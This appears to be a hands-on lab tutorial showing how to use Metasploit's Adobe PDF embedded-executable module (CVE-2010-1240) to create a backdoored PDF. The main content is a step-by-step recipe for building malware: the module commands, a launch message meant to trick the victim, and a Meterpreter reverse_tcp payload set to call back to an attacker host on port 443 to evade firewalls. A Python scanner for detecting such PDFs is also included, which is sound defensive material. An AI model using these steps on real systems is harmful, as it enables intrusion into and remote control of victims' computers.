Creating PDF Files with Windows Backdoors

Beginner

Introduction

In this lab, we will explore how to leverage the embedded executable vulnerability in Adobe PDF to inject a Windows backdoor. The lab process involves transmitting a PDF file containing a backdoor to a Windows host; the target Windows system is infected when its owner opens the PDF file in Adobe Reader.

The lab environment provided by LabEx lacks a Windows virtual machine, so we cannot verify the effectiveness of the attack. The lab process will only demonstrate how to embed the backdoor program.

Furthermore, you do not need to start a target machine in this lab. You only need to start the Kali Linux environment, and the successfully created PDF file will be placed in the /root/ directory of the Kali host.

Start Metasploit Framework Console

Now you will start the attack machine (Kali Linux container) and the target machine (Metasploitable2 virtual machine) for the experiment.

  1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:

     sudo virsh start Metasploitable2

  2. Test the connectivity to the target machine by pinging it:

     ping 192.168.122.102

     Press Ctrl+C to stop the ping.

  3. Launch the Kali Linux container and enter the bash environment by running:

     docker run -ti --network host b5b709a49cd5 bash

  4. Inside the Kali container, test the network connection to the target machine:

     ping 192.168.122.102

     Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.

In the Kali Linux container, enter the following commands in the Kali Linux bash terminal:

service postgresql start
msfdb init
cd ~
msfconsole

This will start the PostgreSQL database service, initialize the database, and launch the Metasploit Framework Console (msfconsole) for further operations.

Use the Exploit Module

In the msfconsole, execute the following command to use the exploit module:

use exploit/windows/fileformat/adobe_pdf_embedded_exe

This will load the adobe_pdf_embedded_exe exploit module, which allows us to embed an executable payload into a PDF file.

Use the show options command to view the configurable options for the exploit module:

show options

This will display the available options, such as:

  • EXENAME: The path to the executable file to be embedded in the PDF.
  • FILENAME: The name of the output PDF file (default: evil.pdf).
  • INFILENAME: The full path to the input PDF file (default: a built-in PDF file).
  • LAUNCH_MESSAGE: The message prompt to trick the user into executing the embedded executable.

You can leave most options at their default values, but you may want to set the INFILENAME option to specify the path to the input PDF file you want to infect.

After configuring the options, use the exploit command to execute the attack:

exploit

This will embed the payload into the specified input PDF file and generate a new PDF file with the embedded executable.

Press Ctrl+D to quit the Metasploit console, then begin the inspection.

Examine the Output

After executing the exploit, the generated PDF file containing the malicious payload will be located at /root/.msf4/local/evil.pdf. You can exit the msfconsole and examine the file:

ls -l /root/.msf4/local/evil.pdf

You should observe an increase in the file size, indicating the presence of the embedded executable. When the PDF file is opened, it will display the configured launch message, prompting the user to click and execute the embedded program.
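Beyond the file size, a defender can check for the structures this technique leaves in the PDF: an embedded file stream and a launch action (the CVE-2010-1240 vector). The following scanner is an added example, not part of the lab or of Metasploit; the two sample PDFs are constructed inline and the hex-escape normalisation is a simple heuristic, not a full PDF parser.

```python
import re
import sys

# PDF name objects the embedded-exe technique depends on. /EmbeddedFile together
# with /Launch is the CVE-2010-1240 pattern; /OpenAction and /JavaScript are
# weaker signals that also occur in legitimate documents.
MARKERS = (b"/EmbeddedFile", b"/Launch", b"/OpenAction", b"/JavaScript")

def normalise_names(data: bytes) -> bytes:
    """Decode PDF name hex escapes (e.g. /L#61unch -> /Launch) so that
    trivially obfuscated names still match. Coarse: applied to the whole file."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)

def scan_pdf_bytes(data: bytes) -> dict[str, int]:
    """Return {marker: occurrences} for every marker present in the file."""
    text = normalise_names(data)
    return {m.decode(): text.count(m) for m in MARKERS if m in text}

def is_suspicious(data: bytes) -> bool:
    """Flag a PDF that carries both an embedded file and a launch action,
    the combination described on this page (embedded executable + launch prompt)."""
    found = scan_pdf_bytes(data)
    return "/EmbeddedFile" in found and "/Launch" in found

# Constructed minimal PDFs for demonstration only (not real module output).
BENIGN_PDF = (
    b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n%%EOF\n")
MALICIOUS_PDF = (
    b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"3 0 obj << /Type /EmbeddedFile /Length 2 >> stream\nMZ\nendstream endobj\n"
    b"4 0 obj << /S /L#61unch /F (payload.exe) >> endobj\n%%EOF\n")

if __name__ == "__main__":
    # Usage: python pdf_launch_check.py /root/.msf4/local/evil.pdf
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            blob = fh.read()
        verdict = "SUSPICIOUS" if is_suspicious(blob) else "no launch+embedded pattern"
        print(path, scan_pdf_bytes(blob), verdict)
```

Run it against the generated evil.pdf to see which markers the module's output actually contains; absence of the markers is not proof of a clean file, since compressed object streams can hide them.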

Set a Custom Payload

To make the infected PDF more valuable, we can set a custom payload for it.

Re-enter the msfconsole:

cd ~
msfconsole

In the msfconsole, follow the previous steps to select the attack module:

use exploit/windows/fileformat/adobe_pdf_embedded_exe

This time, we will use the windows/meterpreter/reverse_tcp payload, which is a Meterpreter backdoor that establishes a TCP connection from the compromised host back to the attacker's machine, allowing direct access to the compromised system. You can use the show payloads command to view and select other payloads if desired.

Set the windows/meterpreter/reverse_tcp payload:

set payload windows/meterpreter/reverse_tcp

Configure the payload by specifying the IP address and port of your Kali host to receive the incoming connection. Make sure the target host can connect to your Kali host:

set lhost 192.168.122.1

Using port 443 can help bypass some firewalls:

set lport 443

Then use the exploit command to generate the malicious PDF:

exploit

Press Ctrl+D to quit the Metasploit console, then begin the inspection.

Examine the Output Again

Check the size of the generated PDF file:

ls -l /root/.msf4/local/evil.pdf

You should notice that the file is smaller than the one generated with the default payload, because the windows/meterpreter/reverse_tcp payload is more compact.

Summary

In this lab, we learned how to leverage the Adobe Reader vulnerability (CVE-2010-1240) that fails to validate embedded content in PDF files. By embedding a backdoor program into a PDF file and tricking the user into executing it, we can gain access to the target Windows host. The key points covered in this lab include:

  • Basic Linux commands
  • Metasploit Framework Console operations
  • Introduction to the Adobe PDF Embedded EXE Vulnerability (CVE-2010-1240)
  • How to exploit the vulnerability and embed a backdoor program

The lab provided hands-on experience in creating malicious PDF files with embedded payloads, configuring different options, and understanding the impact of different payloads on the file size. This knowledge can be useful for understanding and mitigating such attacks in real-world scenarios.
